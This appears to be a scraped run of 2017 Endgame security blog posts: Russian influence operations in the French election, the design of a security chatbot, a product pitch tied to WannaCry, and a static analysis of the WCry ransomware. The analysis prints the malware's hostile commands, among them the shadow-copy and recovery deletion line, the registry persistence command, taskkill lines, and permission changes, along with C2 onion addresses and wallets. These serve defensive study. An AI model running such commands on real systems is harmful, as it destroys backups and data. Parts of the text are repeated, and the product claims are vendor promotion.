≪ Previous: No Experience Required: Ransomware in 2017 and Beyond

At least as early as February, France’s intelligence agency warned that Russia aimed to influence the presidential elections in favor of Front National candidate, Marine LePen. Throughout the spring, there already were indications of bots and false amplifiers spreading disinformation about Emmanuel Macron. Election watchers braced for some sort of data dump to dramatically influence the election. But it never came. Then, just 48 hours prior to the election, and just an hour before France’s media outage, Macron’s campaign reported a 9GB breach, with Russia as the main suspect. While this cyber attack has garnered the most attention, it is important to highlight that data breaches are just one component of Russia’s multi-pronged information security strategy. Information operations comprise more than just a cyber attack, and equating the two has been detrimental to defenses and response strategies. A brief summary of the influence operations targeting Macron’s campaign in the lead up to the French elections, and the data dump this weekend, provides a useful case study as targeted cyber attacks and influence operations threaten to destablize democracies across the globe.

Information Operations != A Hack

Influencing an election and hacking a campaign can be similar but different, and this difference is important as it impacts how organizations prepare their defenses. Definitions could add great clarity, and are essential well beyond wonky semantic debates on the Hill. Facebook’s recent paper on information operations is a very useful starting point, and defines (page 5) information operations as, “Actions taken by governments or organized non-state actors to distort domestic or foreign political sentiment, most frequently to achieve a strategic and/or geopolitical outcome. These operations can use a combination of methods, such as false news, disinformation, or networks of fake accounts (false amplifiers) aimed at manipulating public opinion.” The only reference to hacking is account hacking, and the authors avoid semantic laziness by providing the concrete parameters of the various aspects of influence operations, additionally defining false news, false amplifiers, and disinformation. With its large role as a social media platform, Facebook is in a unique position to help provide clarity to a broader audience, which is desperately needed.

Facebook’s taxonomy is also fairly consistent with the U.S. military doctrine, which views cyberspace as a domain within the information environment, and cyberspace operations are just one of many information-related capabilities to achieve the desired objective. Cyberspace increasingly is the medium in which information operations occurs. When it comes to cyber attacks, the National Institute for Standards and Technology defines a cyber attack as, “An attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.” These are useful distinctions when looking at the nuanced and varied objectives of adversaries.

Information operations are multi-faceted efforts to influence, and similarly attackers possess a range of objectives when conducting cyber attacks. At times they are mutually exclusive, such as when IP theft occurs for espionage (cyber attack, but not an information operation), or when bots spread disinformation (information operation without a cyber attack). Since the United States presidential election, there continues to be a constant flow of reports and articles decrying election hacking. Most of these reports conflate information operations and cyber attacks. There has yet to be evidence of tampering of any voting devices, but there were the infamous compromises of DNC and DCCC emails, which does constitute a cyber attack. Most also agree that Russia did attempt to influence the US presidential election, just as they had done previously elsewhere, as part of an information operations campaign.

Unfortunately, when discussing current events, these semantic nuances are lumped together for simplicity, confounding a broad range of information operations activities as ‘hack’. This not only perpetuates theoretical underdevelopment within the community, but it hinders advancements in defenses and incident response planning. It also impacts policies, which in the United States at least, are often several decades old and could greatly benefit from modernization.

Modus Operandi for Information Operations

How do the various aspects of information operations work together and what role do cyber attacks play? The French election provides a useful heuristic to explore some of the key aspects of multi-faceted information operations campaigns, such as those linked to Russia.

Cyber Attacks

For months prior to the election, Macron had been accusing Russia of attempting to compromise his campaign, but never provided evidence. Understanding that his pro-EU stance made him a likely target of Russian information operations, Macron’s campaign took information security seriously and remained on high alert. In late April, a Trend Micro report described how a Russian group (they dub Pawn Storm, aka APT 28, Fancy Bear and several other alias) created fake websites to harvest credentials. Macron’s digital chief confirmed the attempted intrusions, but also that they were thwarted. Just over a week later, and within hours of the election, Macron’s campaign confirmed a massive breach of internal communications. Targeted attacks such as this for data exfiltration, destruction, or a number of other objectives are only increasing.

Bots as False Amplifiers

For information operations, the computer attacks alone are generally not sufficient if they do not reach a broad audience. By one estimate, over this past weekend, 40% of #MacronGate tweets were produced by 5% of the accounts. #MacronLeaks reached 47,000 retweets in the first three hours following news of the hack. This amplification online helped move the meme from the United States to France, which, by law, was entering a moratorium on commentary on the French election. Even before the hack, Macron was targeted by social bots. The Digital Forensic Research Lab articulated how Russia was using bots as false amplifiers against the Macron campaign, greatly expanding the reach of the French-language version of Russian state-sponsored news outlets Sputnik and Russia Today. According to their analysis, this amplification is not an anomaly, but has persisted for at least six months.

False News & Disinformation

Disinformation campaigns are nothing new. However, thanks to bots, social media, and the apparent appeal of clickbait, false news and disinformation are reaching a broader audience and finding more success in today’s tech and social environment. For instance, Sputnik’s French-language version, under the auspices of fair reporting, repeatedly published biased reporting against Macron or in favor of LePen. RT and Sputnik ramped up negative coverage of Macron as the race drew closer, including unsupported allegations against his personal life and portraying him as an agent for the US banks. Finally, following the final presidential debate, Macron filed a lawsuit against the false information presented by LePen during the debate. She failed to provide any evidence, and demonstrates that as the respective parties and their leadership reiterate false information and treat it as a truism, it increasingly becomes accepted.

Preparing for Targeted Attacks

How organizations prepare for and respond to targeted attacks can greatly impact the extent of the damage. Understanding the attacker, and their objectives, is a first step as there are often lessons learned to help inform a baseline defense. For instance, the French broadcasting company, TV5Monde, was almost destroyed in 2015 by a digital attack. First attributed to ISIS, a Russian group (the same APT 28) has been linked to the highly targeted attack that included wiper malware to destroy the company’s systems. Moreover, lessons learned from Russian information operations during the U.S. elections also served as a guidepost as to how they combine cyber attacks, bots and false information. Organizations - especially political campaigns - must be aware that targeted attacks are going to compromise eventually and be prepared to remediate through both technical response as well as public relations (for the private sector) or policy (for the public sector) responses.

With that back drop in mind, the French government and the Macron campaign both remained on heightened alert throughout the election. From suspending overseas electronic voting to Macron’s preemptive warnings that his campaign was under attack, the French public was well-aware of the chances of a data breach, as well as wary of the intent of the attackers. The media also adhered to a blackout, limiting the reporting of the data dump that has been perceived as nothing (to date) out of the ordinary. As for the Macron campaign itself, they were well aware of the spearphishing approach and fake websites established to harvest credentials, and extremely confidential information was not sent via email. As the eleventh hour data dump illustrates, targeted attackers eventually find a way in, and thus remediation must also be in place. This may have even included planting false documents, about which more information is likely to emerge confirming or refuting this speculation.

For campaigns and governments, modernization of outdated policies is essential to tackle the range of cyber attacks and information operations. Following the compromise of emails, the French electoral commission noted that the dissemination of that information is liable to classification as a criminal offense, which also helped contain the information to less respected sources. Current President François Hollande also vowed a response to the attack, but has yet to clarify what that may entail. Macron similarly vowed retaliation, and his foreign policy advisor warned, “We will have a doctrine of retaliation when it comes to Russian cyberattacks or any other kind of attacks." It will be important to keep an eye on how French policy evolves, and if there are lessons learned as Britain and Germany gear up for elections later this year.

↧

Augmenting Analysts: To Bot or Not?

May 11, 2017, 7:31 am

≫ Next: Don't (W)Cry, You've Got Endgame

≪ Previous: Cyber Attacks, Bots and Disinformation in the French Election

Image may be NSFW.
Clik here to view.

Earlier this year, we announced Artemis, Endgame’s chat interface to facilitate and expedite complex analyses and detection and response within networks. Bots have been all the rage over the last few years, but had yet to make a splash in security. On the one hand, tech trends come and go and it is essential to refrain from jumping on the latest fad and avoid forcing the wrong solution onto a specific problem. At the same time, we could see the value in leveraging natural language processing in a conversational interface to reimagine search and discovery. And so we started on our journey into security bots. In this first of two posts, we’ll walk through our research problem and use case, the lessons learned as we dug deep into bot research, and the challenges with implementing a paradigm change in the way analysts and operators are accustomed to interacting with data. I mean we’re talking about a glorified chatbot, right? How hard can this be? Surely it wouldn’t require design discussions with engineering, product, data science, front end, UX, and technical writers...

Our Challenge

As data scientists working in security, we are well aware of the ever-growing data challenges, and the complaints of those analysts who are forced to find creative ways to circumvent the clunkiness of their current toolset. Their current workflow is manually-intensive, and any automation requires scripting or programming knowledge. They needed a way to help automate some of the rote processes, while integrating analytics such as anomaly detection that take too long to be operationally impactful. Often, when analysts are provided tools that help in this area, they either don’t fit the workflow, require learning some kind of proprietary language. In some cases, the tools actually make life harder, not easier, for the analysts.

Even if the automation challenge is overcome, most security teams still lack resources to stay apace of the growing challenges from the data and threat environments. This lack of resources crosses over into three distinct areas - time, money, and personnel. It is no secret that, on average, the time to discovery and detection of an attack lags significantly behind the time it takes for an attacker to achieve his or her objective. Consider the OPM breach, where the attackers had access to US personnel data for over a year before discovery. Unfortunately, most security teams lack the personnel and funding to shorten this gap.

Finally, while other tech industries have embraced and prioritized user experience for their broad and diverse user base, the security industry continues to make tools for themselves. They generally require a level of expertise that simply exceeds the talent pipeline, which simultaneously also detracts many from entering the field.

It is against this backdrop that we started to explore a solution that addresses these three core challenges security teams encounter:

Insufficient resources
Lack of automated tools
Usability of security platforms

Image may be NSFW.
Clik here to view.

Why Build A Bot?

We explored different ways to augment our users’ ability to tackle these three challenges by focusing on enhancing their ability to discover and remediate alerts. This remains a core pain point, with alert fatigue and false positives impeding their workflow. We wanted a solution that provided analysts an interface to ask questions of their data, automate collection, and bring back only the relevant information from an endpoint. When exploring our solution, we had two primary users to consider: Tier 1 and Tier 3 analysts.

Image may be NSFW.
Clik here to view.

As the graphic above illustrates, even though these individuals work together as a part of a security team, their workflows could not be more different. But maybe, if done correctly, we could augment Tier 1 analysts while providing Tier 3s a non-obtrusive (and even helpful!) interface for their day-to-day. Our solution: An intelligent assistant or a chatbot.

A bot allowed us to build a service that leverages natural language processing to determine user intentions and help automate workflows. By mimicking conversation, we could provide users an interface that allowed them to be as expressive or as curt as they want as they inquire about everything from alerts to endpoint data.

Image may be NSFW.
Clik here to view.

Rule #1 in Bot Design: Manage Expectations

When we pitched the idea to our team we were mindful of tossing around words like Artificial Intelligence. After all, we weren’t building JARVIS from Iron Man and at no point was Scarlett Johansson going to starting talking to SOC analysts about the latest network threats. Moreover, we emphasized that this feature would not be the abrasive hell that was MS Clippy. Instead we kept it simple. We posited that a simple conversational interface could encourage users to dig deep into endpoint data by eliminating the need for query syntaxes or complex click through user interfaces. It cannot be overstated that managing expectations was paramount to get the project off the ground. Once we were given the go-ahead a bigger question arose… “How are we going to build this thing?”

Challenges with Open Source Bots

The rise of bots and intelligent assistants is largely due to an increase in Bot Development Kits or BDKs. Companies like Wit.ai (acquired by Facebook), API.ai (acquired by Google) and Chatfuel provide a simple UI for the development of closed-domain, rule-based, goal-oriented bots where no real programming skills are required to successfully launch a bot. In addition, Microsoft and Amazon have released their own dev kits to allow users to quickly get an app integrated into their platforms. These various kits are treasure troves of knowledge on how best to build a bot to suit your needs. We would have loved to use any single one of them, but we were trying to provide a bot within our EDR Platform to interact with complex endpoint data, using a diverse and industry-targeted vocabulary none of these frameworks currently supported.

For instance, large companies have generally focused on building general assistant bots and deploying them on third-party platforms like Slack or Facebook Messenger. Our assistant had to be structured to enable users in a SOC to perform their duties safe and efficiently on our platform, making it impossible to use a third party bot kit service. The specificity of the security domain meant that we often weren’t working with just translating buttons from a form into a bot. Instead the entities (an NLP term we’ll dive into in the next post) we extract are often semistructured at best, and the intents are as varied as “find bad things” to “pull memory from this running process with PID 4231”.

After reviewing the current state-of-the-art it was clear we had our work cut out for us. Where and how do we acquire the dialog data necessary to build our bot? How can we account for and properly capture the diversity in vocabulary across the information security domain? How can we build a tool that helps train Tier 1 analysts while preventing Tier 3 analysts from being shackled by rigid, scripted routines. It was on us to figure out what makes a bot tick and then implement it ourselves.

Designing Artemis

The engine for Artemis needed to fulfill certain design goals. For starters, bot architectures can be rule-based or driven by machine learning, and is primarily dependent on the amount of training data at your disposal. The goal is to produce a dialog tree similar to the one pictured below that is designed to complete a task. Each branch of the tree represents a question a user must answer to progress to the next node or state.

Image may be NSFW.
Clik here to view.

To move toward this functionality, the bot needs to handle missing values for a given intent. For example a user might like to search for a process by name or PID to find if a specific piece of unwanted software is running on multiple endpoints. The user might write “find processes with the name svchost.exe on all endpoints” or “search processes on all endpoints”. In the second example, the intent classifier can classify “search processes” as a ‘search_process’ intent and then note that the intent contains an ordered list of required and wanted values. When Artemis is faced with a known intent and a lack of needed values, it simply asks the user to enter the missing value. Simple, but it works.

In addition to handling missing entities, some intents require multiple values in a single user input, such as username, process and endpoint. Some values a user enters can be recognized by a pattern-matching grammar, but some value types are hard to tell apart from one another. The best we can hope for here is disambiguation. So within a certain context “Admin” is likely a user name, but it may also be a file name. In this case, Artemis will propose one based on context and offer the opportunity to change its interpretation to file name.

Another finer point of implementing dialog systems, explored in detail in this Microsoft Research paper is implicit confirmation. Once done entering in the query string of the search, the user shouldn’t be forced to tell Artemis to continue to the endpoint selection. Instead, Artemis must implicitly confirm the query string choice and move the user towards the endpoint selection and execution of the operation. Although this may seem obvious, early draft designs of Artemis left the user in limbo. After entering one entity, the bot would reply that it “got it” but then wouldn’t move to the next.

This is why our development occurred so closer with both practitioners and our user experience team to ensure we account for as many of these ‘gotchas’ as possible. We took the wide-range of subject matter expertise at Endgame: incident responders, hunters, designers, and malware analysts, and built custom workflows and recommendations on what to do next during an investigation.

Next Steps

Having explored the state-of-the-art in bots, properly scoped our requirements, and integrated subject matter and design expertise, we were ready to finally throw some data science at it and make Artemis a reality. But before we could provide anything useful, we first had to teach Artemis to understand what the end user typed in the window. No. Easy. Task. In our next post, we’ll get into the technical details of our natural language processing (NLP) approach, including the basic tenets of NLP that are relevant to bots and the necessity to coordinate with user experience designers to truly address our user’s key pain points. Combining user-centric design with our natural language understanding pipeline proved to be the essential factor in delivering cutting edge data science capabilities within our user-friendly platform.

↧

Don't (W)Cry, You've Got Endgame

May 12, 2017, 3:22 pm

≫ Next: WCry/WanaCry Ransomware Technical Analysis

≪ Previous: Augmenting Analysts: To Bot or Not?

Three of the most prominent attack trends in cybersecurity converged today: ransomware attacks, data dumps of nation-state offensive capabilities, and an emergence of the healthcare industry as a leading victim of cyber attacks. The confluence of these trends resulted in a wide-scale ransomware attack that to date has already hit over 70,000 computers in 74 countries. These numbers are likely to grow. Most notably, sixteen hospitals in the United Kingdom were locked down today, disrupting or cancelling the majority of services. The ransomware also impacted several large companies in Spain, including Telefonica, but did not disrupt customer service as it was limited to their internal network.

The attack deployed an exploit called Eternal Blue, which exploits a known Windows vulnerability that was secured in March 2017 by MS17-010. This was recently released in a Shadow Brokers data dump. While it is not yet known who is behind this ransomware attack, it is indicative of the increasing (usually inadvertent) ‘tech transfer’ of nation-state capabilities to other groups. Given the ongoing impact of this ransomware attack, we immediately tested our platform against it. Let’s walk through some details of the ransomware, our layered prevention approach, and how 2017 already seems to be overshadowing 2016 with the continued sophistication and reach of ransomware.

Layered Prevention

This WCry ransomware (aka several names, including WanaCryptor and WannaCry), responsible for today’s widespread attack provides a harsh lesson in properly securing systems. The exposure of so many systems to the MS17-010 vulnerability has enabled this ransomware to propagate rapidly. Patches should have been applied when the patch was released and especially when it became clear that the Shadow Brokers exploit was mitigated by the patch. Organizations who haven’t patched should be urgently scrambling to patch now. As this ransomware attack demonstrates, IT organizations often fail to promptly patch their systems. This occurs for numerous reasons, including concerns over disruption to business processes and difficulty maintaining an accurate inventory of assets. Because of this, defenses must be in place which can reliably and consistently block a wide range of attacks, including those which can take advantage of a new vulnerability and spread rapidly such as this one.

The WCry ransomware demonstrates the necessity of layered prevention to protect enterprises from ransomware and other forms of targeted attacks. Organizations need effective defenses against exploitation, malware and fileless attacks, and malicious behaviors all operating in parallel. In addition, these layers must be effective in detecting never-before-seen attacks. As we’ve seen time and time again, signature-based defenses can’t compete against motivated and sophisticated attackers. This reality forms the foundation of Endgame’s zero-breach tolerance approach to defending customer networks.

Preventing the Attack

Traditional signature-based AVs are generally ineffective against novel, emergent attacks such as this one. Financially-motivated attackers know this and operate accordingly. The WCry dropper file (24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c) was not broadly detected by antivirus programs the morning of May 12 when the outbreak began to spread. This surely played a role in its “success” from the view of the adversary.

However, Endgame’s MalwareScore™, and its machine-learning based approach to detection, can stop this attack in its tracks. With MalwareScore™, prevention is in place with no prior knowledge of the WCry malware itself, protecting customers at the outset of the attack. Always wary of exaggerated claims about how AI and machine learning can solve every security problem in the industry, we know machine-learning itself is not a silver bullet. But when applied correctly, it is a powerful tool for the defender to battle widespread attacks such as today’s ransomware attack.

Why does machine learning do better in detecting new, never-before-seen malware? Machine learning is better at generalizing at scale than humans. Computers are very good at finding small distinguishing patterns across millions of malware samples and then recognizing those patterns in unknown samples. These patterns are analogous to human-derived signatures, except that they apply to far more samples than a signature for a particular sample, allowing a classifier to better predict new malware. As the image below demonstrates, MalwareScore™ successfully detected WCry. Endgame’s core engine is available in VirusTotal if you want to test it out for yourself.

Image may be NSFW.
Clik here to view. Screen Shot 2017-05-12 at 2.14.56 PM.png

Malware Prevention End User Popup Notification for the WCry dropper

However, no malware detection capability is perfect. If anyone tells you they will detect all current and future malware through machine learning alone, they are lying. This is why layered preventions are important. So what if this particular dropper or follow-on files don’t get stopped by your malware defenses?

If allowed to run, the dropper will write multiple files to disk and execute the ransomware encryptor functionality under two separate contexts: one as a child process to a command shell running under services.exe and another as a child process of the dropper under Windows Explorer.

Image may be NSFW.
Clik here to view.

WCry Dropper Process Tree

Image may be NSFW.
Clik here to view.

WCry Service Process Tree

On systems where malware prevention is not enabled, or if a variant emerged which is in the 1% of malware not detected by MalwareScore™, Endgame’s ransomware protection feature is in place to stop ransomware attacks. This feature, which we will describe in detail in an upcoming post, monitors dozens of aspects of all system processes in real-time. Very shortly after ransomware activity kicks off, threads associated with the ransomware activity are suspended, protecting critical data on customer machines.

We tested this on a machine protected by Endgame with MalwareScore™ prevention turned off. As expected, our ransomware prevention feature detects the malicious activity immediately after it begins. Critical data on these systems is protected.

Image may be NSFW.
Clik here to view.

Ransomware Protection End User Popup Notification for WCry

Conclusion

Over the following days and weeks, we are likely to better grasp the extent and impact of WCry, which has spread outside of Europe and into Asia as of this writing. These kinds of targeted and widespread attacks can be very lucrative, and until that changes, they are likely to become more common as well. Layered behavioral preventions are necessary to stop these ransomware attacks, and modern attacks in general which are increasingly targeted. They are especially necessary to stop the sort of attack we see unfold today within the UK NHS and elsewhere. This particular attack has been enabled by an unfortunate proliferation of suspected nation-state level capabilities combined with poor patching practices. As this worm propagation continues, keep in mind that the payload of this attack is preventable with the right defenses.

↧

WCry/WanaCry Ransomware Technical Analysis

May 14, 2017, 6:36 pm

≫ Next: So You Wanna Stop Ransomware? Detailing Endgame Ransomware Protection

≪ Previous: Don't (W)Cry, You've Got Endgame

As we discussed Friday when this outbreak began, the WCry or WanaCrypt0r ransomware spread quickly across Europe and Asia, impacting almost 100 countries and disrupting or closing 45 hospitals in the UK. As the ransomware continued to propagate, I got my hands on a sample and quickly began analyzing the malware. This post will walk through my findings and provide a technical overview of the strain of WCry ransomware which caused the massive impact on Friday. Many have done great work analyzing this malware in action and helping contain its spread, and I hope my comprehensive static analysis will provide a good overall picture of this particular ransomware variant on top of that.

The Note

With estimates over 100,000 computers impacted globally thus far, many people received unwelcome notes Friday similar to those below demanding a fee to decrypt their files. Notes like these are unfortunately all too common and typical of today’s ransomware. While the notes promise to return the data, it’s not guaranteed that paying the ransom will return data safe and sound, but if it gets this far and adequate backups are not in place, it may be the only recourse the victim has. No one ever wants to see one of these.

Ransom Note

Image may be NSFW.
Clik here to view. Ransom Note

Ransom Note Desktop Background

Image may be NSFW.
Clik here to view. Ransom Note Desktop Background

Where to Begin?

There has been a lot of discussion about the method of propagation and the overall impact of this ransomware, but what does this ransomware actually do from start to finish? That is the question I’ll answer in this post.

To begin, we accessed the malware by grabbing it (SHA256 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/MD5 Db349b97c37d22f5ea1d1841e3c89eb4 ) from VirusTotal. See the appendix for a summary of the files dropped with the malware.

Dropper Malware Details

MD5: Db349b97c37d22f5ea1d1841e3c89eb4

Image may be NSFW.
Clik here to view. Dropper Malware Details

Dropped EXE Details

MD5: 84c82835a5d21bbcf75a61706d8ab549

Image may be NSFW.
Clik here to view. Dropped EXE Details

The WCry Execution Flow

The WCry ransomware follows a flow similar to that of other ransomware as it damages a machine. The high level flow is as follows: It begins with an initial beacon, other researchers have already reported is basically a killswitch function. If it makes it past that step, then it looks to exploit the ETERNALBLUE/MS17-010 vulnerability and propagate to other hosts. WCry then goes to work doing damage to the system, first laying the foundations for doing the damage and getting paid for recovery, and once that’s done, WCry starts encrypting files on the system. See the diagram below for an overview of how this malware works. I’ll walk through each of these steps in more detail below.

Image may be NSFW.
Clik here to view. WCry Execution Flow

As the graphic illustrates, the malware inflicts damage by executing a series of tasks. I’ll walk through each of these tasks, which are numbered below. Each first level of the outline corresponds to that step in the execution flow graphic.

Initial infection and propagation

1. Beacon to hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com. Successful connection will cause the malware to quit. Note that other researchers have reported seeing strains since Friday which have an alternate killswitch URL.

2. Run the resource Exe as a new service

a. If Command line args as “-m security”

1. OpenSCmanager

2. Create a new service called "Microsoft Security Center (2.0) Service”; “mssecsvc2.0" as mssecsvc.exe

3. StartService

4. Load Resource “tasksche.exe”

5. Save as C:\\WINDOWS\\tasksche.exe

6. Move C:\\WINDOWS\\tasksche.exe to C:\\WINDOWS\\qeriuwjhrf

b. Else Propagate via SMB ETERNAL BLUE / DOUBLE PULSAR Exploit

1. OpenSCManager

2. Access service “mssecsvc2.0"

3. Change Service Config

4. Start Service Crtl Dispatcher (Run SMB Exploit)

a. Run thread containing the Payload transfer

Image may be NSFW.
Clik here to view. Thread Payload

Setting up the payload

b. GetAdaptersInfo to get IPs

c. New thread to propagate the payload

Image may be NSFW.
Clik here to view. Payload Delivery

Payload Delivery

1. Get TCP Socket for Port 445 (Server Message Block/SMB)
2. Connect to SMB Socket and get SMB tree_id

a. SMB_COM_NEGOTIATE
b. Get Tree: ipc_share = "\\\\#{ip}\\IPC$” and SMB_COM_TREE_CONNECT_ANDX
c. SMB_COM_TRANSACTION

Image may be NSFW.
Clik here to view. Metasploit

Example Pseudocode: The screenshot above is from the Metasploit Framework's implementation created after the Shadow Broker's leaks and recent weaponized exploit from RiskSense-Ops.

3. Run smb ms17-010 Exploit function
a. do_smb_ms17_010_probe(tree_id)

1. Setup SMB_TRANS_PKT

b. If vulnerable, do_smb_doublepulsar_probe(tree_id)
1. Prepare Base64 Payload in Memory
2. Setup SMBv1 Echo Packet
3. make_smb_trans2_doublepulsar

a. Setup SMB_TRANS2_PKT (See Appendix)
4. if code == 0x51: Successful payload
c. Execute Payload Shellcode (See Appendix)
Image may be NSFW.
Clik here to view. Code 51
If code == 0x51 - successful payload!!!

c. After Service execution

1. Gets the computer name
2. Randomizes string
3. Get command line args and Checks for switch “/i”

Preparation for Ransomware Activity

3. Extract ZIp and Prep Tor and Bitcoin Info:

a. Extract resource zip file XIA with hardcoded password “WNcry@2ol7”
b. Get c.wnry, which includes the Tor configuration used by the malware used by the malware
c. Extract the configuration from c.wnry to get the Tor browser and onion sites to be used for communication and onion sites to be used for communication:

gx7ekbenv2riucmf.onion;

57g7spgrzlojinas.onion;

xxlvbrloxvriy2c5.onion;

76jdd2ir2embyv47.onion;

cwwnhwhlz52maqm7.onion;

hxxps://dist[.]torproject[.]org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

d. Load Bitcoin wallets which have been previously set up by the attackers for payment for file restoration and update c.wnry

“13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94”

“12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw"

“115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"

4. Hide Extract Zip Directory and Modify Security Descriptors

a. Create process: Runs command to hide current directory: "attrib +h .“
b. Runs command: icacls . /grant Everyone:F /T /C /Q. This grants all users full access to files in the current directory and all directories below.

5. Prep Encryption Public Key, AES Key, Decrypt the DLL

a. Load exports with getprocaddress: CreateFileW, WriteFile, ReadFile, MoveFileW, MoveFileExW, DeleteFileW, CloseHandle
b. Set up Encryption Keys

1. SetUp Cypto function exports: CryptGenKey, CryptDecrypt, CryptEncrypt, CryptDestroyKey, CryptImportKey, CryptAcquireContextA
2. Get RSA_AES Cryptographic Provider
3. CryptImportKey import the hard coded public key

BOOL WINAPI CryptImportKey(

_In_ HCRYPTPROV hProv,

_In_ BYTE *pbData,

_In_ DWORD dwDataLen, 1172B 2048 bit RSA key (See Appendix)

_In_ HCRYPTKEY hPubKey,

_In_ DWORD dwFlags,

_Out_ HCRYPTKEY *phKey

);

3. Parse t.wnry to get AES key used to decrypt the DLL key used to decrypt the DLL
a. WANACRY! Length 8
b. Read Length 100h = Encrypted AES Key
c. Read 4h = 04 00 00 00
d. Read 8h DLL Length = 00 00 01 00 00 00 00 00
e. Decrypt Encrypted AES Key with Public Key
f. Read encrypted DLL length 1000h
g. Decrypt DLL with custom AES-128-CBC algorithm with 16B AES Key (See Appendix)
4. Get Native System Info and GetProcessHeap

5. Put EncryptedData In Heap Location
6. Change the protection of that memory location.

Encrypted DLL Details

96de5f0587f7201b9f5f16ba2e374f80

Image may be NSFW.
Clik here to view. Encrypted DLL Details

Spoofed information the decrypted DLL’s VERSIONINFO resource

6. Run DLL Export at function TaskStart

7. Creates Encryption Keys to be used by the user file encryption routine

a. Create Encryption Key by Encrypting the user’’s private key with the ransomware public key and stored in “%08X.eky” (See Appendix)
b. Also tries to access “%08X.dky” for the received Decryption key

8. Creates Mutex for all threads: Global\\MsWinZonesCacheCounterMutexW

a. Other researchers have noted that if this mutex is present, the malware will not start, offering another way to defend against this malware.

9. Creates a new thread pointing to the setup that starts encrypting files

a. Generates AES Keys to encrypt files using CryptGenKey

Encryption routine

10. Creates a new thread to overwrite files on disk

a. Generate a key
b. Generate Data Buffers for each file
c. Call thread for function StartAddress to begin writing encrypting file contents
d. Tack on extension ".WNCRYT”

11. Run new process taskdl.exe in a new thread

12. Set Up the Decrypter Persistence:

a. Read Configuration File
b. Finds the location of @WanaDecryptor@.exe
c. Create process "taskse.exe @WanaDecryptor@.exe”
d. Set persistence key to run itself on reboot HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
e. CheckTokenMembership, GetComputerName Info
f. Run: cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v "<rand>" /t REG_SZ /d “\"tasksche.exe\"" /f
g. Looks for “f.wnry" (what this is for is not clear in my analysis)

@WanaDecryptor@.exe Details

MD5: 7bf2b57f2a205768755c07f238fb32cc

Image may be NSFW.
Clik here to view. WanaDecryptor.exe Details

Spoofed information the decrypted DLL’s VERSIONINFO resource

13. Runs: @WanaDecryptor@.exe fi

a. Reads config file for Tor Client
b. Runs Tor Client. Note that I did not drill into the communications deeply during this analysis. It’s basically connecting to the .onion sites listed above to allow for user payment and tracking.

14. Creates @WanaDecryptor@.exe persistence and backup

a. Creates lnk file @WanaDecryptor@.exe.lnk via batch script

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut(“@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs

b. Write to <randominteger>.bat

1. Execute batch script
2. Delete: del /a %%0

15. Creates Ransom Notes @Please_Read_Me@.txt from “r.wnry"
16. Encrypts files, kills /database and email server-related processes if they are running

a. Capture UserName
b. Get Drive Type
c. Runs:

taskkill.exe /f /im Microsoft.Exchange.*

taskkill.exe /f /im MSExchange*

taskkill.exe /f /im sqlserver.exe

taskkill.exe /f /im sqlwriter.exe

taskkill.exe /f /im mysqld.exe

d. Check Free Disk Space
e. Loops through files and encrypts (see appendix for the targeted extensions) and encrypts (See Appendix for the targeted extensions)

17. Runs: @WanaDecryptor@.exe co

a. Writes to .res file compiled by the time decrypted

b. Writes to .res file compiled by the time decrypted

c. Run Tor service: taskhsvc.exe TaskData\Tor\taskhsvc.exe

18. Runs: cmd.exe /c start /b @WanaDecryptor@.exe vs

a. Deletes the volume shadow copies with the command: Cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet with the command: Cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

Conclusion

Despite its ability to propagate so quickly, the ransomware activities taken by this malware are not particularly interesting or novel. As I demonstrated in this malware, the killswitch in the execution flow provided a unique opportunity to slow down the ransomware. As security researcher MalwareTech discovered, and Talos described in detail, this malware was programmed to bail out upon a successful connection to that server, which stops the malware altogether. We should all thank MalwareTech for setting up the sinkhole, which caused this outbreak to slow sooner than it otherwise would have.

This malware is easy to modify. As mentioned above, other researchers are already finding variants in the wild. If you’re running Windows and haven’t patched yet, now’s the time to do it. And while you’re at it, go test your backups to build some confidence that you won’t be forced to choose between paying up or losing data should the worst happen to you or your organization.

Appendix

Summary of Files

Image may be NSFW.
Clik here to view. Screen Shot 2017-05-14 at 8.23.46 AM.png

Zip File (b576ada...31) Contents

Image may be NSFW.
Clik here to view. Screen Shot 2017-05-13 at 9.39.43 PM.png

Extensions to encrypt

